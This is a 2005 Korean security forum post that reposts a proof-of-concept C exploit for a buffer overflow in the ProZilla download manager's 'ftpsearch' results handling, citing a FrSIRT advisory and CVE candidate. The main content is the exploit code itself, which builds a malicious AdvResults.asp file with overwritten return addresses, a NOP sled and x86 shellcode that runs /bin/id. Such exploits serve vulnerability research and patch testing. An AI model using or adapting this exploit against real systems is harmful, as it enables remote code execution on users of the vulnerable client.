아이디/패스워드 기억
최근사진
Total : 87,775
Yesterday : 42
Today : 71

ProZilla "ftpsearch" Option Client-Side Buffer Overflow Exploit

ino | 2005.10.03 18:40 | 조회 1159
ProZilla "ftpsearch" Results Handling Client-Side Buffer Overflow Exploit
Date : 02/10/2005

Advisory : FrSIRT/ADV-2005-1916
CVE Reference : CAN-2005-2961
Rated as : High Risk

#include
#include
#include

#define OVERFLOW (1<<10)+32
#define SLEDSIZ (1<<10)
#define RETADDR 0x806977a+SLEDSIZ/2
#define OUTPUT "AdvResults.asp"

/*
* prozilla bug, found while auditing for gentoo bug #70090
* -taviso@gentoo.org
*/

/* execve() /bin/id */
unsigned char shellcode[] =
"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e"
"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3"
"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc"
"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07"
"\x9f\xcf\x2d\x8e";

int main(int argc, char **argv)
{
unsigned char *buf;
void *ret = (void *) RETADDR;
FILE *exploit;
int i;

exploit = fopen(OUTPUT, "w");
fprintf(exploit, "
");

buf = malloc(OVERFLOW);
for (i = 0; buf + i < buf + OVERFLOW; i += sizeof(void *))
memcpy(buf + i, &ret, sizeof(void *));
fwrite(buf, OVERFLOW, 1, exploit);
fprintf(exploit, "
");
buf = realloc(buf, SLEDSIZ + sizeof(shellcode));
memset(buf, 0x90, SLEDSIZ);
memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));
fwrite(buf, SLEDSIZ + sizeof(shellcode), 1, exploit);
free(buf);
fprintf(stderr, "[*] %s created.\n", OUTPUT);
return 0;
}
twitter facebook me2day 요즘
110개(1/6페이지)
보안
번호 제목 글쓴이 조회 날짜
110 공유기별 기본 패스워드 및 포트포워딩 위치. 몰라맨 313 2016.07.25 09:58
109 usb 사용흔적제거에 강력한 유틸 몰라맨 249 2014.03.14 21:33
108 Adobe Flash Player/Reader/Acrobat 신규 취약점 몰라맨 288 2011.03.21 10:10
107 제로보드 보안 패치 pl9 첨부파일 ino 500 2009.02.10 18:45
106 [일반] Google's new Web browser (Chrome) allows ino 525 2008.09.05 09:47
105 [일반] 해킹의 표적 -가상 메모리 파일(Pagefile.sys)을 윈도우 종료시 ino 694 2008.02.19 13:25
104 [일반] 시스템 분석 - 추적 비밀글 ino 5 2008.02.05 16:16
103 [일반] Updated sendmail packages fix security i ino 1201 2006.04.18 10:37
102 [일반] 공개 웹 게시판 제로보드 취약점 패치 권고 ino 3572 2006.04.02 18:22
101 [일반] Microsoft Windows WMF/EMF File Handling ino 1300 2005.11.17 11:13
100 [일반] openssl 보안 업데이트 ino 1298 2005.10.17 21:19
99 [일반] Linux Kernel Local Denial of Service and ino 1296 2005.10.11 23:29
98 [일반] Kaspersky Anti-Virus Products Remote Hea ino 1117 2005.10.04 15:20
>> [일반] ProZilla "ftpsearch" Option Client-Side ino 1160 2005.10.03 18:40
96 [일반] Updated kernel packages fix security iss ino 2465 2005.06.19 17:43
95 [일반] MySQL MaxDB Webtool Remote Stack Overflo ino 1505 2005.05.11 21:39
94 [일반] IBM AS/400 LDAP Server User Accounts Dis ino 1516 2005.04.06 11:01
93 [일반] PHP 4.x/5.x Denial of Service and Securi ino 1505 2005.04.03 13:23
92 [일반] Linux Kernel v2.6.10 Remote Denial of Se ino 1503 2005.03.30 21:22
91 [일반] overwriting low kernel memory ino 1465 2005.03.23 15:02